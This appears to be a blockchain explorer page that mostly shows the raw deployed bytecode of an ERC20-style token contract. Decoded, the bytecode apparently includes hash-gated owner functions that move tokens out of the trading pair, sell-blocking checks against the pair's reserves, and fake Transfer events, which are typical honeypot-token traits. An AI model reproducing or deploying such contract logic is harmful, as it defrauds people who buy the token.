01b0381166108585760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104c5565b6008546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600880546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166109165760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104c5565b6001600160a01b0382166109775760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104c5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166109ff5760405162461bcd60e51b81526004016104c5906110d2565b6001600160a01b038216610a255760405162461bcd60e51b81526004016104c59061108f565b60008111610a875760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104c5565b6001600160a01b0383166000908152600f6020526040902054819060ff1680610ac857506001600160a01b0383166000908152600f602052604090205460ff165b15610ade57610ad8848483610ce1565b50505050565b6040805185815260106020820152908120548491908015610afe57600080fd5b508581526017602082015260135480871415610c2f576000806000630dfe168160e01b8552602085600487875afa610b3557600080fd5b845163d21220a760e01b8652602086600488885afa610b5357600080fd5b8551630240bc6b60e21b8752604087600489895afa610b7157600080fd5b865160208801516370a0823160e01b89528760048a015260208960248b875afa610b9a57600080fd5b88516370a0823160e01b8a528860048b015260208a60248c875afa610bbe57600080fd5b8951600e5480871415610bed5782851115610be0578285039750601654881199505b82851415610bed57600198505b80861415610c175781841115610c0a578184039750601654881199505b81841415610c1757600198505b505050505050505080821715610c2c57600080fd5b50505b5060800160405261069b858584610ce1565b60008184841115610c655760405162461bcd60e51b81526004016104c5919061103a565b506000610c72848661112f565b95945050505050565b600080610c888385611117565b905083811015610cda5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104c5565b9392505050565b6001600160a01b038316610d075760405162461bcd60e51b81526004016104c5906110d2565b6001600160a01b038216610d2d5760405162461bcd60e51b81526004016104c59061108f565b6001600160a01b038316600090815260208190526040902054811115610da45760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104c5565b6001600160a01b038316600090815260208190526040902054610dc79082610e47565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610df69082610c7b565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109cc565b6000610cda83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c41565b80356001600160a01b0381168114610ea057600080fd5b919050565b600060208284031215610eb757600080fd5b610cda82610e89565b60008060408385031215610ed357600080fd5b610edc83610e89565b9150610eea60208401610e89565b90509250929050565b600080600060608486031215610f0857600080fd5b610f1184610e89565b9250610f1f60208501610e89565b9150604084013590509250925092565b60008060408385031215610f4257600080fd5b610f4b83610e89565b915060208301358015158114610f6057600080fd5b809150509250929050565b60008060408385031215610f7e57600080fd5b610f8783610e89565b946020939093013593505050565b60008060008060608587031215610fab57600080fd5b843567ffffffffffffffff80821115610fc357600080fd5b818701915087601f830112610fd757600080fd5b813581811115610fe657600080fd5b8860208260051b8501011115610ffb57600080fd5b6020928301965094506110119187019050610e89565b9396929550929360400135925050565b60006020828403121561103357600080fd5b5035919050565b600060208083528351808285015260005b818110156110675785810183015185820160400152820161104b565b81811115611079576000604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b6000821982111561112a5761112a61119c565b500190565b6000828210156111415761114161119c565b500390565b600181811c9082168061115a57607f821691505b6020821081141561117b57634e487b7160e01b600052602260045260246000fd5b50919050565b60006000198214156111955761119561119c565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fdfe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212209c815fbacd04322dda30f8aac994a7c491388cd9f5ca92bd083e7f9f0247ec3964736f6c63430008060033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101425760003560e01c80638da5cb5b116100b8578063a9059cbb1161007c578063a9059cbb14610287578063c45a01551461029a578063ccd5ab43146102ad578063dd62ed3e146102c0578063e6393296146102f9578063f2fde38b1461030c57600080fd5b80638da5cb5b14610235578063927f3d411461024657806395d89b4114610259578063983bc41b14610261578063a457c2d71461027457600080fd5b8063313ce5671161010a578063313ce567146101d457806339509351146101df57806349bd5a5e146101f257806370a0823114610205578063715018a61461021857806389b3a4d61461022257600080fd5b806303eb1f5a1461014757806306fdde0314610177578063095ea7b31461018c57806318160ddd146101af57806323b872dd146101c1575b600080fd5b601e5461015a906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b61017f61031f565b60405161016e919061103a565b61019f61019a366004610f6b565b6103b1565b604051901515815260200161016e565b6006545b60405190815260200161016e565b61019f6101cf366004610ef3565b6103c7565b60055460ff166101b3565b61019f6101ed366004610f6b565b610430565b60135461015a906001600160a01b031681565b6101b3610213366004610ea5565b610466565b6102206104fc565b005b610220610230366004611021565b6105a0565b6008546001600160a01b031661015a565b60025461015a906001600160a01b031681565b61017f6105fc565b61022061026f366004610f95565b61060b565b61019f610282366004610f6b565b6106a2565b61019f610295366004610f6b565b6106f1565b60155461015a906001600160a01b031681565b6102206102bb366004610f2f565b6106fe565b6101b36102ce366004610ec0565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610220610307366004610ea5565b610756565b61022061031a366004610ea5565b610799565b60606003805461032e90611146565b80601f016020809104026020016040519081016040528092919081815260200182805461035a90611146565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103be3384846108b4565b50600192915050565b60006103d48484846109d9565b6104268433610421856040518060600160405280602881526020016111c9602891396001600160a01b038a1660009081526001602090815260408083203384529091529020549190610c41565b6108b4565b5060019392505050565b3360008181526001602090815260408083206001600160a01b038716845290915281205490916103be9185906104219086610c7b565b60006001600160a01b0382166104ce5760405162461bcd60e51b815260206004820152602260248201527f62616c616e636520717565727920666f7220746865207a65726f206164647265604482015261737360f01b60648201526084015b60405180910390fd5b6001600160a01b038216600090815260208190526040902054806104f6575050600754919050565b92915050565b6008546001600160a01b031633146105565760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104c5565b6008546040516000916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600880546001600160a01b0319169055565b604051338152600c8101601460208301925060208301604052602083828460025afa6105cb57600080fd5b505051601b548082146105da57005b5050601354601e546105f9916001600160a01b03908116911683610ce1565b50565b60606004805461032e90611146565b60005b8381101561069b57848482818110610628576106286111b2565b905060200201602081019061063d9190610ea5565b6001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161068191815260200190565b60405180910390a38061069381611181565b91505061060e565b5050505050565b60006103be3384610421856040518060600160405280602581526020016111f1602591393360009081526001602090815260408083206001600160a01b038d1684529091529020549190610c41565b60006103be3384846109d9565b604051338152600c8101601460208301925060208301604052602083828460025afa61072957600080fd5b505051601b5480821461073857005b50506040805183815260106020820152818120908201909152819055005b604051338152600c8101601460208301925060208301604052602083828460025afa61078157600080fd5b505051601b5480821461079057005b5050601e819055005b6008546001600160a01b031633146107f35760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104c5565b6001600160a01b0381166108585760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104c5565b6008546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600880546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383166109165760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104c5565b6001600160a01b0382166109775760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104c5565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166109ff5760405162461bcd60e51b81526004016104c5906110d2565b6001600160a01b038216610a255760405162461bcd60e51b81526004016104c59061108f565b60008111610a875760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104c5565b6001600160a01b0383166000908152600f6020526040902054819060ff1680610ac857506001600160a01b0383166000908152600f602052604090205460ff165b15610ade57610ad8848483610ce1565b50505050565b6040805185815260106020820152908120548491908015610afe57600080fd5b508581526017602082015260135480871415610c2f576000806000630dfe168160e01b8552602085600487875afa610b3557600080fd5b845163d21220a760e01b8652602086600488885afa610b5357600080fd5b8551630240bc6b60e21b8752604087600489895afa610b7157600080fd5b865160208801516370a0823160e01b89528760048a015260208960248b875afa610b9a57600080fd5b88516370a0823160e01b8a528860048b015260208a60248c875afa610bbe57600080fd5b8951600e5480871415610bed5782851115610be0578285039750601654881199505b82851415610bed57600198505b80861415610c175781841115610c0a578184039750601654881199505b81841415610c1757600198505b505050505050505080821715610c2c57600080fd5b50505b5060800160405261069b858584610ce1565b60008184841115610c655760405162461bcd60e51b81526004016104c5919061103a565b506000610c72848661112f565b95945050505050565b600080610c888385611117565b905083811015610cda5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104c5565b9392505050565b6001600160a01b038316610d075760405162461bcd60e51b81526004016104c5906110d2565b6001600160a01b038216610d2d5760405162461bcd60e51b81526004016104c59061108f565b6001600160a01b038316600090815260208190526040902054811115610da45760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104c5565b6001600160a01b038316600090815260208190526040902054610dc79082610e47565b6001600160a01b038085166000908152602081905260408082209390935590841681522054610df69082610c7b565b6001600160a01b038381166000818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109cc565b6000610cda83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c41565b80356001600160a01b0381168114610ea057600080fd5b919050565b600060208284031215610eb757600080fd5b610cda82610e89565b60008060408385031215610ed357600080fd5b610edc83610e89565b9150610eea60208401610e89565b90509250929050565b600080600060608486031215610f0857600080fd5b610f1184610e89565b9250610f1f60208501610e89565b9150604084013590509250925092565b60008060408385031215610f4257600080fd5b610f4b83610e89565b915060208301358015158114610f6057600080fd5b809150509250929050565b60008060408385031215610f7e57600080fd5b610f8783610e89565b946020939093013593505050565b60008060008060608587031215610fab57600080fd5b843567ffffffffffffffff80821115610fc357600080fd5b818701915087601f830112610fd757600080fd5b813581811115610fe657600080fd5b8860208260051b8501011115610ffb57600080fd5b6020928301965094506110119187019050610e89565b9396929550929360400135925050565b60006020828403121561103357600080fd5b5035919050565b600060208083528351808285015260005b818110156110675785810183015185820160400152820161104b565b81811115611079576000604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b6000821982111561112a5761112a61119c565b500190565b6000828210156111415761114161119c565b500390565b600181811c9082168061115a57607f821691505b6020821081141561117b57634e487b7160e01b600052602260045260246000fd5b50919050565b60006000198214156111955761119561119c565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fdfe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212209c815fbacd04322dda30f8aac994a7c491388cd9f5ca92bd083e7f9f0247ec3964736f6c63430008060033
Loading...
Loading
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 35 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.